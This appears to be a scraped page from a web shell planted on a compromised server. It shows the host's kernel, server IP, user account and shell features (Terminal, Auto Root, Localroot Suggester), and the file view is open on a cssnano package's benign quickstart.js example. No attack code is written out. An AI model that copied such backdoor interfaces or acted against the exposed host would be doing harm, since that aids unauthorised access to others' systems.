Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.135.246.88
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
cssnano /
Delete
Unzip
Name
Size
Permission
Date
Action
dist
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
node_modules
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
CHANGELOG.md
11.57
KB
-rw-rw-r--
2022-08-30 11:49
LICENSE-MIT
1.07
KB
-rw-rw-r--
2022-08-30 11:49
README.md
2.39
KB
-rw-rw-r--
2022-08-30 11:49
package.json
3.37
KB
-rw-rw-r--
2022-08-30 11:49
quickstart.js
654
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
/* * This example targets Node 4 and up. */ const cssnano = require('cssnano'); /* * Add your CSS code here. */ const css = ` h1 { color: #ff0000; font-weight: bold; } `; /* * Add your configuration here; see http://cssnano.co/options/ and * http://cssnano.co/optimisations/ for more details. * * For example you can turn off z-index rebasing by setting `zindex: false` * in your config, or you can use `safe: true` which will turn off unsafe * optimisations. */ const opts = { }; /* * Compress the CSS asynchronously and log it to the console. */ cssnano.process(css, opts).then(result => { console.log(result.css); });